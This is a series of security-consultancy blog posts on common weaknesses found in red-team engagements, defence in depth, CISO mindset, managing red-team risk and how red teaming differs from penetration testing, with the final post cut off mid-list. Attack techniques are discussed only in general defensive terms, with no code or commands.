Flawed Foundations – Issues Commonly Identified During Red Team Engagements

Cybersecurity Red Team engagements are exercises designed to simulate adversarial threats to organisations. They are founded on real world Tactics, Techniques, and Procedures that cybercriminals, nation states, and other threat actors employ when attacking an organisation. It is a tool for exercising detection and response capabilities and to understand how the organisation would react in the event of a real-world breach.

One of outcomes of such exercises is an increased awareness of vulnerabilities, misconfigurations and gaps in systems and security controls which could result in the organisation’s compromise, and impact business delivery, causing reputational, financial, and legal damage.

Most of the time, threat actors rarely need to employ cutting edge capabilities or “zero day” exploits in order to compromise an organisation. This is because organisations grow organically, they exist to deliver their business, and as a result, security is not a key consideration from its founding, this means that critical issues can exist in the foundations of the organisation’s IT which threat actors will be more than happy to abuse.

This post covers five of the most common vulnerabilities we regularly see when conducting red team engagements for our clients. Its’s purpose is to raise awareness among IT professionals and business leaders about potential security risks.

Insufficient privilege management

This issue presents when accounts are provided with privileges within the organisation greater than what they require to conduct their work. This can present as: users who have local administrator privileges, accounts who have been given indirect administrator privileges, or overly privileged service accounts.

Some examples include:

  • Users who are all local administrators on their work devices –  This gives them the ability to install any software they might need to conduct their work, but also exposes the organisation to significant risk, should that device or user account become compromised. If users do require privileges on their laptops, then they should also be provided with a corporate virtual device (either cloud or on host based), which has different credentials from their base laptop, and is the only device permitted to connect to the corporate infrastructure. This will limit the exposure of the risk and permit staff to continue to operate. In a red team, this permits us to abuse a machine account, and gain the ability to bypass numerous security tools and controls which would normally impede our ability to operate.
  • Users with indirect administrator privileges – in Microsoft Windows Domains, users can belong to groups, however groups can also belong to other groups, and as a result users can inherit privileges due to this nesting. Whilst it was never the intention to grant  a user administrator privileges, and whilst the user is unaware that they have been given this power, such a misconfiguration can result quite easily and exposes the organisation to considerable risk. This can only be addressed through an in-depth analysis of the active directory and consistent auditing combined with system architecture. This sort of subtle misconfiguration only really becomes apparent when a threat actor or red team starts to enumerate the active directory environment; when found though it rapidly leads to a full organisation compromise.
  • Overly privileged service accounts – service accounts exist to ensure that specific systems such as databases or applications are able to authenticate users accessing them from the domain and to provide domain resources to the system. A common misconfiguration is providing them with high levels of privilege during installation even though they do not require them. Service accounts, due to the way they operate need to be exposed, and threat actors who identify overly privileged accounts can attempt to capture an authentication using the service. This can be attacked offline to retrieve the password, which can then lead to greater compromise within the estate. Service accounts should be regularly audited for their privileges, where possible these should be removed or restricted. If it is not a domain managed service account (a feature made available from Windows Server 2012 R2 onwards), then ensuring the service account has a password of at least 16 characters in length, which is recorded in a secure fashion if it is required in the future will severely restrict threat actors abilities to abuse these. Abuse of service accounts is becoming rarer but legacy systems which do not support long passwords means there are still significant amounts of these sorts of accounts present. Abuse of these accounts can often be tied to whether they have logon rights across the network or not – as identifying them being compromised can often be problematic if the threat actor or red team operate in a secure manner.

Poor credential complexity and hygiene

This issue presents when users are given no corporately supported method to store credential material; as a result passwords chosen are often easy to guess or predict, and they are stored either in browsers, or in clear text files on network shared drives, or on individual hosts.

  • Credential Storage – staff will often use plain text files, excel documents, emails, one notes, confluence,  or browsers to store credentials when there is no corporately provided solution. The problem with all of these options is that they are insecure – the passwords can be retrieved using trivial methods; which means the organisations are often one step away from a  significant breach. Password vaults such as LastPass, BitWarden, KeyPass, OnePass, etc. whilst targets for threat actors do offer considerably greater protection, as long as the credentials used to unlock them are not single factor, or stored with the wallet. It is standard practice for red teams and threat actors to try to locate clear text credentials, and attacking wallets significantly increases the difficulty and complexity of the tradecraft required when the material to unlock the wallet uses MFA or is not stored locally alongside it.
  • Credential Complexity – over the last 20 years the advice on password complexity has changed considerably. We used to advise staff to rotate passwords every 30/60/90 days, choose random mixes of uppercase, lowercase, numbers and punctuation, and have a minimum length; today we advise not rotating passwords regularly, and instead choosing a phrase or 3 random, easy to memorise words which are combined with punctuation and letters. The reason for this is because as computational power has increased, smaller passwords, regardless of their composition have become easier to break. Furthermore, when staff rotated them regularly, it would often result in just a number changing rather than an entirely new password being generated, as such they would also become easy to predict. Education is critical in addressing this. Furthermore many password wallets will also offer a password generator that can make management of this easier for staff whilst still complying with policies.  Too often I have seen weak passwords, which complied with password complexity policies because people will seek the simplest way to comply. Credential complexity buys an organisation time, time to notice a breach, raises the effort a threat actor must invest in order to be effective in attacking the organisation.

Insufficient Network Segregation

 This issue occurs when a network is kept flat – hosts are allowed to connect to any server or other workstations within the environment on any exposed ports regardless of department or geographical region. It also covers cases where clients  which connect to the network using VPN are not isolated from other clients.

  • VPN Isolation –  Clients which connect to the network through VPN to access domain resources such as file shares, can be directly communicated with from other clients. This can be abused by threat actors who seed network resources with materials which will force clients who load them to try to connect with a compromised host. Often this will be a compromised client device. When this occurs, the connecting host transmits encrypted user credentials to authenticate with the device. These can be taken offline by the threat actor and cracked which could result in greater compromise in the network.  Securing hosts on a VPN limits the threat actor, and red team in terms of where they can pivot their attacks, and makes it easier to identify and isolate malicious activities.
  • Flat Networks – networks are often implemented to ensure that business can operate efficiently, the easiest implementation for this is in flat networks where any networked resource is made available to staff regardless of department or geographical location, and access is managed purely by credentials and role-based access controls (RBAC). Unfortunately, this configuration will often expose administrative ports and devices which can be attacked. When a threat actor manages to recover privileged credentials then, a flat network offers significant advantages to them for further compromise of the organisation. Segregating management ports and services, breaking up regions and departments and restricting access to resources based on requirements will severely restrict and delay a threat actors and red teams ability to move around the network and impact services.

Weak Endpoint Security

Workstations are often the first foothold achieved by threat actors when attacking an organisation. As a result they require constant monitoring and controls to ensure they stay secure. This can be achieved through a combination of maintained antivirus, effective Endpoint Detection and Response, and Application Controls. Furthermore controlling what endpoint devices are allowed to be connected to the network will limit the exposure of the organisation.

  • Unmanaged Devices -Endpoints that are not regularly monitored or managed, increasing risk. Permitting Bring Your Own Device (BYOD) can increase productivity as staff can use devices they have customised; however it also exposes the organisation as these devices may not comply with organisation security requirements. This also compounds issues when a threat is detected, as identifying a rogue device becomes much more difficult as you need to treat every BYOD device as potentially rogue. Furthermore, you have little insight or knowledge as to where else these devices have been used, or who else has used them. By only permitting managed devices to your network and ensuring that BYOD devices, if they must be used, are severely restricted in terms of what can be accessed, you can limit your exposure to risk. Restrictions of managed devices can be bypassed but it raises the complexity and sophistication of the tradecraft required which means it takes longer, and there is a greater chance of detection.
  • Anti-Virus – it used to be the case that anti-virus products were the hallmark of security for devices. However, the majority of these work on signatures, which means they are only effective against threats that have been identified and are listed in their definitions files. Threat Actors know this and will often change their malware so that it no longer matches the signature and therefore can be evaded. This means the protection they offer is often limited but if well maintained, they can limit the organisations exposure to common attacks and provide a tripwire defence should a capable adversary deploy tooling that has previously been  signatured. Bypassing antivirus can be trivial, but it provides an additional layer of defence which can increase the complexity of a red team or threat actors activities.
  • Lack of Endpoint Detection and Response (EDR) configuration- EDR goes one step beyond antivirus and looks at all of the events occurring on a device to identify suspicious tools, behaviours, and activities that could indicate breach. Like anti-virus they will often work with detection heuristics and rules which can be centrally managed. However they require significant time to tune for the environment, as normal activity for one organisation, maybe suspicious in another. Furthermore it permits the organisation to isolate suspected devices. Unfortunately EDR can be costly, both to implement and then maintain correctly – and is only effective when it is on every device. Too often, organisations will not spend time using it, or understand the implementation of the basic rules versus tuned rules. As such false positives can often impact business, and lead to a lack of trust in the tooling. Lacking an EDR product severely restricts an organisation’s ability to detect and respond to threats in a capable, and effective manner. Well maintained and effective EDR that is operated by a well-resourced, exercised security team significantly impacts threat actor and red team activities; often bringing the Mean Time to Detected a breach down from days/weeks to hours/days.
  • Application Control – When application allowlisting was first introduced, it was clunky and often broke a lot of business applications. However it has evolved since those early days but is still not well implemented by organisations. It takes significant initial investment to properly implement but acts in a manner which can strongly restrict a threat actors ability to operate in an environment. Good implementations are based on user roles; most employees require a browser, and basic office applications to conduct their work. From there additional applications can be allowed dependent on the role, and users who do not have application control applied have segregated devices to operate on, which will help limit exposure. Without this, threat actors and red teams can often run multiple tools which most users have no use for or business using during their day jobs; furthermore it can result in shadow IT applications as users introduce portable apps to their devices which makes investigation of incidents difficult as it muddies the water in terms of if it is legitimate use or threat actor activity.

Insufficient Logging and Monitoring

If an incident does occur – and remember that red team engagements are also about exercising the organisation’s ability to respond; then logging and monitoring become paramount for the organisation to effectively respond. When we have exercised organisations in the past, we often find that at this stage of the engagement a number of issues become quickly apparent that prevent the security teams from being effective. These are almost often linked to a lack of centralised logging, poor incident detection, and log retention issues.

  • Lack of Centralised Logging: Threat actors have been known to wipe logs during their activities, when this occurs on compromised devices, it makes detecting activities difficult, and reconstruction of threat actor activities impossible. Centralising logs allows additional tooling to be deployed as a secondary defence to detect malicious activity so that devices can be isolated; it also means that reconstruction of events is significantly easier. Many EDR products will support centralised logging, however this is only true on devices which have agents installed, and on supported operating systems; therefore to make this effective additional tooling may need to be used such as syslog and Sysmon to ensure that logging is sent to centralised hosts for analysis and curating. Centralised logging can also be easier to store for longer periods of time, permitting effective investigations to understand how, what and where the threat actor/red team have been operating and what they accomplished before being detected and containment activities are undertaken.
  • Poor Incident Detection: Organisations which do not exercise their security teams often will act poorly when an incident occurs. Staff need to practice using SIEM (Security Information and Event Management) tooling, and develop playbooks and queries that can be run against the monitoring software in order to locate and classify threats. When this does not occur, identifying genuine threats from background user activity can become tedious, difficult, and ineffective, resulting in poor containment and ineffective response behaviours. When this occurs inn red teams, it can result in alerts being ignored or classed as false positives which leads to exacerbating an incident.
  • Log Retention Issues: many organisations keep at most, 30 days of logs – furthermore many organisations think they have longer retention than this as they have 180 days of alert retention, not realising that alerts and logs are often different. As a result we can often review alerts as far back as 6 months, but can only see what happened around those alerts for 30 days. A lot of threat actors know about this shortcoming, and will often wait 30 days once established in the network to conduct their activities to make it difficult for the responders to know how they got it, how long they have been there, and where else they have been. This often comes up in red teams as many red teams will run for at least 4 weeks, if not longer to deliver a scenario, which makes exercising the detection and response difficult when this issue is present.

Conclusion

These are just the 5 most common issues we identify when conducting a red team engagement; however, they are not the only issues we come across. They are fundamental issues which are ingrained in organisations due to a mixture of culture and lack or deliberate architectural design considerations.

Red team engagements not only help shine a light on these sorts of issues but also allows the business to plan how to address them at a pace that works for them, rather than as a consequence of a breach. Additionally, red team engagements can help identify areas where additional focus testing can help test additional controls, provide a deeper understanding of identified issues, and exercise controls that are implemented following a red team engagement.

Basically, a red team engagement is just the start or milestone marker in an organisation’s security journey. It is used in tandem with other security frameworks and capabilities to deliver a layered, effective security function which supports an organisation to adapt, protect, detect, respond and recover effectively to an ever-evolving world of cybersecurity threats.

Our Red Team services: https://prisminfosec.com/service/red-teaming-simulated-attack/

Why CISOs Need an Adversarial Mindset in Cybersecurity

Chief Information Security Officers (CISOs) are tasked with safeguarding an organisation’s most valuable assets: its data, intellectual property, and reputation. The role of a CISO has evolved from being an overseer of IT security to a strategic leader who must: anticipate and mitigate complex cyber threats, act as the board’s expert in cybersecurity matters which can affect the business, and recognise then balance the risks, costs and timescales of different activities to enhance an organisation’s security capabilities. One way to help navigate this challenging terrain effectively is to adopt an adversarial mindset—one that thinks like the enemy, predicts their moves, and pre-emptively counters their tactics.

Understanding the Adversarial Mindset

An adversarial mindset involves thinking like a hacker or cybercriminal. It is about understanding the motivations, strategies, and techniques that threat actors use to infiltrate and conduct their activities. By adopting this perspective, CISOs can proactively find vulnerabilities, predict potential attacks, and implement robust defences.

This approach is not about being paranoid; it is about being prepared. It helps CISOs to stay ahead of the curve and protect their organizations from ever-evolving threat landscapes.

 Why CISOs Need to Think Like Hackers

Predicting and Pre-empting Attacks

Hackers are innovative and constantly evolving their methods. By thinking like them, CISOs can predict the next move of a cybercriminal and act before an attack occurs. This initiative-taking approach enables the security team to find potential weaknesses and address them before they can be exploited. This can be cultivated with Threat Intelligence to understand who is likely to target the organisation and what their motivations are.

Building Resilient Systems:

A CISO with an adversarial mindset will scrutinize systems from an attacker’s perspective. This means questioning every aspect of the security architecture, finding weak points, and reinforcing them. This can be achieved by melding security teams, developers, and system architects together when designing new systems, supported with robust security testing. This should then be integrated with annual or biennial red team tests to understand how those systems have been integrated into the organisation and understand the attack paths an adversary is likely to take to compromise systems.

Understanding the Human Element:

Cybersecurity is not just about technology; it is also about people. Social engineering attacks, like phishing, rely on exploiting human behaviour. CISOs who think like attackers can better educate their employees on recognising and avoiding these traps, thus reducing the risk of human error leading to a breach. The right phish at the wrong time makes any individual vulnerable; CISOs who understand this and embrace a culture where this accepted and expected allows them to address it effectively, and means an employee is more likely to report a breach, resulting in a higher likelihood of a successful mitigation.

Adapting to Emerging Threats:

The threat landscape is dynamic, with new vulnerabilities and attack vectors emerging regularly. An adversarial mindset keeps CISOs on their toes, encouraging continuous learning and adaptation. This mindset fosters a culture of vigilance within the organisation, ensuring that the security posture evolves alongside the threat landscape. This can be enhanced by sharing knowledge across the business of emerging threats rather than hording it to security teams. By keeping the business informed the business can react more effectively, introducing more controls and procedures to address threats and support the security teams in protecting the business.

Enhanced Incident Response:

When a breach occurs, the speed and effectiveness of the response are critical. CISOs who understand an attacker’s mindset can more quickly identify the nature of the attack, trace its origin, and contain it before it causes considerable damage. This ability to think like the enemy can significantly reduce the impact of a breach. This, like any response capability needs to be regularly exercised – both theoretically with tabletop exercises and practically with red teams. Like holding a fire drill staff, tools, and policies need to be tried out under safe conditions before they can be relied upon in an emergency. A good CISO will arrange for their IR provider to be involved in at least one major exercise a year where the full process is enacted, and any third-party support is fully assessed as well.

Cultivating an Adversarial Mindset

To develop this mindset, CISOs need to engage in continuous learning and stay updated on the latest threat intelligence. Collaborating with ethical hackers, taking part in cybersecurity exercises, and regularly reviewing and updating security protocols are essential practices. Moreover, fostering a culture within the organisation that values security and encourages employees to think critically about potential threats can amplify the effectiveness of the CISO’s efforts.

Additionally, networking with peers in the industry and taking part in cybersecurity communities can offer valuable insights into emerging threats and effective countermeasures. This collective knowledge-sharing can be a powerful tool in staying one step ahead of cyber-threat actors.

Conclusion

The adversarial mindset is a crucial part of a successful cybersecurity strategy. For CISOs, thinking like an attacker is not just a defensive tactic; it is an initiative-taking approach to safeguarding the organisation. By expecting threats, building resilient systems, and fostering a culture of security awareness, CISOs can ensure that their organisations are not just reacting to cyber threats, but staying ahead of them.

Layered Defences: Building Blocks of Secure Organisations

Every organisation is different in terms of how it uses data, how its processes work, and how their staff conduct themselves. As a result no single security tool, deployment, implementation, or capability can protect them.

Layered defences, also known as “defence in depth,” is the approach of implementing multiple layers of security controls to protect against a wide range of threats, ensuring that if one layer fails, others are in place to mitigate the risk. Furthermore, each layer is designed to address specific types of threats, creating a comprehensive shield that protects against potential attacks.

The concept of layered defences is ancient. Our most striking example comes from a time before the computer, when threats would manifest themselves physically against nation-states – castles are the key epitome of a layered defence. The combination of moats, drawbridges, walls, battlements, keeps, towers, turrets, guards, and gatehouses provided a multi-layered defence system that not only protected the castle, but also its inhabitants.

 Regardless of if we are talking about fortifications, or digital estates, by diversifying defences across various points of vulnerability, organisations can reduce the likelihood of a successful breach and limit the impact of security incidents.

The Core Layers of Cybersecurity Defence

To build an effective layered defence strategy, organisations must consider various aspects of their IT environment and implement appropriate security measures at each level. Below are the core layers typically involved in a robust cybersecurity defence:

Perimeter Security

Perimeter security is the first line of defence, focusing on preventing unauthorized access to the network. Common controls at this layer include firewalls which support domain reputation services, intrusion detection and prevention systems (IDPS), secure gateways, mail filters, and intercepting SSL/TLS inspecting proxies. These tools help monitor and filter traffic, blocking malicious activity before it reaches the internal network.

Network Security

Once traffic passes through the perimeter, network security controls come into play. These measures include network segmentation, virtual private networks (VPNs), and network access control (NAC). Network security ensures that even if an adversary gains access to the perimeter, they are limited in their ability to move laterally within the network.

Endpoint Security

With the proliferation of remote work and mobile devices, securing endpoints has become increasingly important. Endpoint security involves installing antivirus software, endpoint detection and response (EDR) tools, and ensuring that devices are patched and up to date. This layer helps protect individual devices from being compromised and becoming entry points for adversaries.

Application Security

Adversaries often target applications due to their complexity and potential vulnerabilities. Application security focuses on securing software applications through secure coding practices, regular updates, and the use of web application firewalls (WAFs). By protecting applications, organisations can prevent attacks such as SQL injection, cross-site scripting (XSS), and other common exploits which may result in an adversary gaining an additional foothold or obtaining material which could further ran attack.

Data Security

At the heart of every cybersecurity strategy is the protection of data. Data security measures include encryption, data loss prevention (DLP) tools, and access controls that ensure only authorised users can access sensitive information. By securing data both at rest and in transit, organisations can reduce the risk of data breaches and ensure compliance with regulations.

Identity and Access Management (IAM)

IAM is crucial for ensuring that only the right individuals have access to the right resources at the right time. Implementing strong authentication methods, such as multi-factor authentication (MFA), and managing user privileges through role-based access control (RBAC) are essential components of IAM. This layer helps prevent unauthorised access and reduces the risk of insider threats, and limits an adversaries ability to make rapid progress should they manage to compromise an endpoint and its user.

Security Awareness and Training

The human element is often the weakest and the strongest link in cybersecurity. Providing regular security awareness training and promoting a security-conscious culture are vital components of a layered defence strategy. Educating employees on phishing, social engineering, and safe online practices can significantly reduce the likelihood of human error leading to a security incident. Furthermore, motivated and supported staff are more willing and likely to report unusual behaviour which could be indicative of an ongoing threat. Giving staff the tools to effectively report, and regularly praising, listening to feedback, and rewarding behaviours that protect the organisation benefits the whole business. Businesses which dictate security, punish one-off breaches, and have a culture which derides or ridicules staff who have fallen victim to an adversary, will often suffer more in the long term as staff become more fearful to report incidents as it could harm their career.

Incident Response and Recovery

Despite the best defences, breaches can and will still occur – no organisation will achieve 100% security and stay in business. Having a robust incident response and recovery plan is essential for minimising the impact of a security incident. This layer includes incident detection, response planning, regular drills, and data backups. Being prepared to respond quickly and effectively can make all the difference in mitigating damage and restoring normal operations.

The Benefits of a Layered Defence Approach

  • Redundancy and Resilience: A single security control can be bypassed or fail, but multiple layers ensure that an attack must overcome several hurdles, increasing the chances of detection and prevention.
  • Comprehensive Protection: Different layers address different types of threats, ensuring that the organisation is protected from various angles. This multi-faceted approach is more effective than relying on a single line of defence.
  • Reduced Attack Surface: By implementing security measures at various points, organisations can minimize their attack surface, making it more difficult for adversaries to find vulnerabilities.
  • Improved Incident Response: Layered defences provide multiple opportunities to detect and respond to threats, allowing for quicker identification and mitigation of attacks.

Trust and Verify

Implementing these defences is only one part of the story. They need to be regularly exercised and maintained. This is where  vulnerability scans can identify missing patches, misconfigured ports, and exposed appliances; penetration tests can evaluate individual layers; purple teaming can enhance the detection capabilities; and red teams can examine end-to-end attack paths, exercising as many of the layers as possible to identify gaps, and exercise incident responses. This can occur in both digital, and physical environments of the organisation. Through conducting these tests we can verify that they are not drifting, and this in turn acts as an additional layer of defence.

Conclusion

A  layered defence strategy is not just an option—it is a necessity. By implementing multiple layers of security controls and assessing them, organisations can better protect their assets, reduce the risk of successful attacks, and ensure a more resilient cybersecurity posture.

Investing in layered defences means thinking holistically about security, considering all potential vulnerabilities, and preparing for the unexpected. In the long run, this approach will not only safeguard your organisation’s digital assets but also build trust with customers, partners, and stakeholders who rely on your commitment to security.

Managing Risk in Red Team Engagements

In today’s rapidly evolving digital landscape, organizations face an ever-growing array of cyber threats. To stay ahead, many are turning to red team testing – a proactive approach where skilled cybersecurity professionals simulate real-world attacks to uncover misconfigurations, vulnerabilities, and inconsistent security behaviours. However, as with any initiative, red team testing carries its own set of risks. Effectively managing these risks through a risk management strategy is crucial to ensuring that the testing process not only strengthens security but also avoids unintended consequences.

Understanding the Scope and Objectives

Before launching a red team exercise, it’s vital to have a clear understanding of the test’s scope and objectives. Define what you aim to achieve – whether it’s identifying gaps in defences, testing incident response protocols, or evaluating the resilience of critical assets. This clarity will help you manage expectations, design a suitable test plan, and mitigate risks associated with scope creep, which can lead to unexpected disruptions.

Tip for clients: Engage stakeholders early in the planning process to align the red team’s objectives with the organization’s overall security strategy.

Mitigating Operational Disruption

Red team exercises often involve simulating sophisticated attacks, which can inadvertently disrupt normal business operations. To mitigate this risk, agreeing a defined methodology with the red team to understand critical elements within the business and where additional care needs to be taken is critical.

This is tricky to get right, as testing needs to demonstrate real world impact to have value to the organisation. A good red team wants to exercise an organisation’s detect, respond, and recover capabilities, as it provides a controlled situation to evaluate and improve those capabilities before a real-world adversary achieves the same level of access.

Furthermore, every risk management strategy should incorporate a clear communication plan with regular check points and out of band direct communication between the client and testers to minimise disruption and keep stakeholders informed.

Tip for clients: Test plans should include the risk management strategy; ensure your views and knowledge of your environment is taken into account during the drafting of the test plan, or during a risk workshop phase with your red team provider.

Ensuring Legal and Ethical Compliance

One of the biggest risks in red team testing is the potential for legal and ethical breaches. Unauthorized access to systems, data exfiltration, or crossing jurisdictional boundaries can lead to severe legal consequences and damage to an organisation’s reputation.

Tip for clients: Work closely with legal and compliance teams to ensure all testing activities are within legal and ethical boundaries. Obtain necessary permissions and ensure the red team operates with strict adherence to agreed-upon rules of engagement.

Protecting Sensitive Data

During red team testing, there’s a risk that sensitive data could be exposed, either accidentally or intentionally. Red Teams will spend a lot of time digging through corporate data repositories (colloquially known as ‘dumpster diving’) to identify valuable material that enable the test to continue. Whilst conducting this activity, the red team operator will often need to download the material first before opening it, and often they have no clue what material is inside a document they have decided to take beforehand. Unless explicitly required to, they will only take the bare minimum necessary to achieve their objectives, however inadvertent collection can still occur and can lead to exposure of sensitive material. This exposure can lead to data breaches, regulatory penalties, and loss of trust. Understanding how sensitive data will be handled in an engagement can be vital. Where Command and Control (C2) implant frameworks are used for red team engagements, ensuring they make use of strong encryption in transit is important. Equally important however is the consideration of the secure data handling of client material after it has been taken. Ensure red team providers have clear controls which define who will have access to the data, how long the data is kept for, and if the data is encrypted on the red team’s servers. If the material is sensitive and unrelated to testing, the red team should still make their client aware of its location so that suitable measures can be taken to remediate the issue.

Tip for clients: If sensitive data is found during testing, make a record of it. If it requires immediate remediation, then ensure you have a suitable cover story in place for remediating it, that does not expose the red team engagement. After the engagement conduct an audit to see how long it was exposed, who accessed it, and what controls are needed to prevent it from occurring again.

Planning for Incident Response

Even though red team testing is controlled, it is possible, and even likely that at some point the exercise could trigger an actual security incident, especially if the red team uncovers previously unknown vulnerabilities. Keep in mind the purpose of some of these tests is to exercise that response capability. Curtailing a response too soon robs the security team of valuable training and can undermine secrecy of the test – essentially wasting the effort, and cost, the business is investing in conducting the red team test in the first place.

Tip for clients: Understand your thresholds for when to curtail incident responses; balance this against the limitations from halting an investigation too early and the impact this has on exercising business process and incident playbooks.

Learning and Adapting

Finally, the goal of red team testing is not just to identify misconfigurations, vulnerabilities, and inconsistent security behaviours, but to learn from them and adapt. This requires a structured approach to analysing the findings, developing a remediation plan, implementing necessary changes, and continuously improving your security posture. This should extend beyond technical controls and include elements such as incident playbooks, staff upskilling and training opportunities, and policy adjustments.

Tip for clients: Establish a post-test review process where lessons learned are documented and shared with relevant teams. Use these insights to refine your security strategies and prepare for future red team exercises.

Conclusion

Cybersecurity red team testing is a powerful tool for identifying weaknesses and strengthening defences. However, the risks associated with such testing must be carefully managed to ensure that the exercise delivers value without causing unintended harm. By understanding the scope, mitigating operational disruptions, ensuring legal compliance, protecting sensitive data, preparing for incident response, and committing to continuous improvement, organisations can navigate the complexities of red team testing and bolster their cybersecurity resilience.

Remember, in the world of cybersecurity, it’s not just about identifying vulnerabilities – it’s about managing the risks that come with discovering them.

Understanding the Difference Between Red Teams and Penetration Testing in Cybersecurity

Penetration Testing and Red Teaming are both valuable, important, and focussed in their own ways. Too often Penetration Tests are used to assess a system and it is a rinse and repeat of the previous year’s test results, and the organisation states that they have documented and accepted the risks often due to budgetary reasons because those reports lack impact on what those risks actually mean for the entire organisation. What Red Teaming does well is demonstrate that accepting the risks in System A, System B, and System C, and then linking them together with fibre and copper can result in a huge organisational problems that can result in legal, financial, and reputational damage. However, this comes at huge cost, significant resource requirements, and potential business disruptions.

Whilst these services are different, they are complimentary, but we need to understand how they work, and what they are seeking to deliver.

Penetration Testing: A Targeted Security Assessment

Penetration Testing, commonly known as “pen testing,” is a focused security assessment that evaluates a specific system, network, or application for vulnerabilities and misconfigurations. It is a deep dive focussed on a specific area dictated by the client’s requirements. The goal is to identify vulnerabilities that could be exploited by malicious actors. Here is what sets penetration testing apart:

  1. Scope and Focus: Penetration testing typically has a defined scope, targeting specific areas within an organization’s IT infrastructure, usually dictated by a client or by a requirement they have. For instance, a pen test may focus solely on a web application, a network segment, or a particular service. Testing often takes place in non-production, development, or reference environments, where the risk of business disruption is minimised. It focusses on coverage over stealth of the area they have been scoped to assess.
  2. Methodology: Penetration testers follow a structured methodology, often based on established frameworks like OWASP (for web applications) or NIST (for broader infrastructure). The process involves information gathering, vulnerability identification, exploitation attempts, and reporting.
  3. Objective: The primary objective of a penetration test is to find and exploit vulnerabilities and misconfigurations before they can be exploited before threat actors. The focus is on depth, ensuring that all vulnerabilities within the defined scope are uncovered.
  4. Frequency: Pen tests are usually conducted on a periodic basis, such as quarterly or annually, or when significant changes are made to the system.
  5. Impact: Pen test reports often go to IT, system, or project managers as part of a system upgrade or review. Rarely are they escalated to senior leadership and often budgets to fix issues are tightly constrained as how those systems integrate into the wider ecosystem of the organisation is not often considered.

Red Teaming: A Holistic, Adversarial Approach

Red Teaming, on the other hand, is a more comprehensive and adversarial exercise designed to evaluate the organisation’s overall security posture. It simulates a real-world attack scenario where the “Red Team” takes on the role of a motivated adversary. Here’s how red teaming differs from penetration testing:

  1. Scope and Focus: Red teaming has a broader, more flexible scope. Unlike penetration testing, which targets specific systems, red teaming evaluates an organisation’s entire defence mechanisms. This can include physical security, human factors, and business processes dependent on what has been agreed with the client – often this is modelled on the capabilities of specific threat actors. However, the Red Team can attack any part of the organisation to achieve its objectives. Red teaming should occur in Production, after all that is where the threat actors will operate and where the defences really matter. However, this comes with significant increased risk of business disruption, so a red team will often have a dedicated risk manager to oversee the testing to ensure that those risks are recognised and controlled.
  2. Methodology: The Red Team uses tactics, techniques, and procedures (TTPs) similar to those of actual threat actors. The approach is less structured and more creative, often involving social engineering, phishing, and live system manipulation techniques. The objective is not just to find vulnerabilities but to exploit them in a way that mimics a real attack. Every step along a red team’s attack path however should be focussed on what is needed to achieve their objective. They are not going to find every issue in an environment, but like water they will find the cracks and crevices within the organisation and follow those in the path of least resistance to achieve their goals, whilst simultaneously exercising the organisation’s knowledge and defences of those issues.
  3. Objective: The goal of red teaming is to assess the organization’s detection and response capabilities. The Red Team aims to bypass defences, evade detection, and achieve a predefined objective, such as data exfiltration or system compromise, without being caught.
  4. Frequency: Red Team engagements are typically less frequent than penetration tests due to their complexity and scope. They are often conducted annually or in response to specific threat scenarios.
  5. Impact: Due to their cost and complexity, organisations often require board level buy in to fund and commit to an engagement. This has the benefit that the reporting and presentations will often be heard at the most impactful layer of an organisation. Tangible outcomes, and recognition of inherent risks the organisation is carrying are made manifest to the board, so that investment can be made before an adversary can locate and abuse the same issues.

Complementary Roles in Cybersecurity

While penetration testing and red teaming serve different purposes, they are not mutually exclusive. In fact, they complement each other within a robust cybersecurity strategy:

  • Penetration testing helps organisations find and fix specific vulnerabilities, ensuring that systems are secure against known threats.
  • Red Teaming provides a broader assessment, identifying gaps in the organisation’s defences that may not be apparent during a typical pen test.

By understanding and leveraging both approaches, organisations can better prepare for the myriad of threats they face. Penetration testing strengthens the foundation, while red teaming ensures that even the most sophisticated attack vectors are accounted for.

Conclusion

In summary, penetration testing, and red teaming are two critical components of a comprehensive cybersecurity strategy. Penetration testing offers a deep dive into specific vulnerabilities, while red teaming provides a wide-angle view of the organization’s overall security posture. By combining both, organisations can build stronger defences and better protect their most valuable assets.

The Value of Red Teams – Delivering Impact through Analogies

In this blog post, we will explore how red teaming helps identify and then translate intricate technical risks into comprehensible business language, ensuring that stakeholders understand the implications and can take appropriate actions to safeguard their organisations.

Understanding Red Teaming

Red teaming is a structured process where cybersecurity professionals simulate real world threats to help an organisation exercise their defence technologies, training, and processes. Originally derived from military practices, red teaming has been widely adopted in cybersecurity to simulate real-world attack scenarios, identify vulnerabilities, and evaluate the effectiveness of security measures.

The primary objectives of red teaming include:

  • Identifying weaknesses in systems and processes before malicious actors can exploit them.
  • Testing response capabilities and preparedness for potential security incidents.
  • Providing actionable insights  to strengthen defences and mitigate risks.

While the technical findings from red team exercises are invaluable, their true effectiveness lies in how well these insights are communicated to and understood by business stakeholders.

The Challenge of Communicating Technical Risks

Technical professionals often face challenges when conveying complex security issues to non-technical audiences.

These challenges include:

  • Technical Jargon:  Excessive use of specialized terminology can alienate and confuse stakeholders.
  • Abstract Concepts: Some technical risks are abstract and lack tangible context, making them difficult to grasp.
  • Underestimating Impact: Without clear communication, business leaders may underestimate the severity or relevance of certain risks.

Effective communication requires translating technical findings into clear, concise, and relevant information that highlights the business implications of identified risks.

Implementing Effective Communication Strategies

Running red team exercises can help identify issues but translating them into effective information is a massive challenge, and can undermine the value of the test if done poorly.

Cybersecurity professionals are experts at identifying and remediating vulnerabilities, but many do not understand business, or struggle with translating their language into one that business can use effectively.

My advice for cybersecurity professionals, from testers to CISOs is to consider the following when you want to help your non-technical peers understand your concerns:

1. Know Your Audience: Understand the knowledge level and concerns of your stakeholders to tailor the communication accordingly.

2. Use Clear and Concise Language: Avoid unnecessary technical jargon and present information straightforwardly.

3. Leverage Storytelling: Incorporate narratives and analogies to make the information relatable and memorable.

4. Highlight Business Implications: Clearly connect technical findings to potential business outcomes, including financial, operational, and reputational impacts.

5. Provide Actionable Recommendations: Offer clear steps and solutions to address identified risks, facilitating informed decision-making.

In my many years of experience in security testing systems, I have found that the most effective manner to communicate with c-suite executives, regulators, and non-technical audiences is the art of storytelling.

I look at what my red team achieved and break it down into its most simplified format to turn it into a story which can be appreciated by all, by using analogies.

Analogies can help then make that story real to the audience by making it personal to them using common shared experiences. We can then focus our message by explicitly explaining the threats that exist from the inherent risks related to the issue.

The Power of Analogies in Risk Communication

Analogies serve as powerful tools to bridge the understanding gap between technical experts and business leaders. By relating unfamiliar technical concepts to familiar experiences, analogies make complex information more relatable and easier to comprehend.

Benefits of Using Analogies

  1. Simplification: Analogies distil complex ideas into simple, understandable terms.
  2. Engagement: They capture attention and make the information more engaging.
